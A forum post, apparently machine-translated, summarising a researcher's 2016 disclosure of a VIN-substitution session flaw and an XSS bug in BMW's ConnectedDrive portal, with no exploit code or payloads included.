It is currently 15-12-2017 15:20

0-day vulnerability in the portal allow bmw to remotely hack a car

0-day vulnerability in the portal allow bmw to remotely hack a car

by sigismund » 2016-07-11 22:22:14




A researcher from Vulnerability Labs Benjamin Kunz Mandiri (Benjamin Kunz Mejri) discovered two dangerous vulnerability on the ConnectedDrive portal, owned by BMW. ConnectedDrive is the name of the infotainment system of the car, which can be used both in cars themselves, and the various mobile devices that have the corresponding app. Mengri told that the problem is still not fixed, BMW tries in vain to fix bugs for five months.

The first problem relates to the vulnerability session vulnerability, she allows others to know the VIN (Vehicle Identification Number) of another car. The VIN of the car acts as the ID for the account ConnectedDrive is used to backup system settings of machine in the user's account. Substitution settings on the web portal will lead to the fact that they are also changed in the victim's car.

Mandiri writes that the attack allowed him to bypass the validation of the VIN and use the VIN of another car, and then change its settings. ConnectedDrive allows you to lock and unlock the car, gives access to the email account of the victim, allows to obtain information on traffic and routes in real time, control the climate control, lights and alarm system, to replace the list of music tracks and so on.



The second problem — this is a common XSS (cross-site scripting) vulnerability that the researcher found on the password reset page ConnectedDrive. Exploitation of the bug can leak your browser cookies, subsequent CSRF attacks, fishingovym attacks and so on. Just like with any other XSS bug.

The researcher was notified by BMW about the vulnerabilities in February 2016. Since BMW has not taken any measures to resolve the issues, Manjri waited the allotted time and reveal information about bugs. Detailed information and proof-of-concept exploits can be found on the official website Vulnerability Labs: report on the first issue, the report on the second problem.
sigismund
moderators
Сообщений: 788
Депозит: 0 BTC

Rating: 5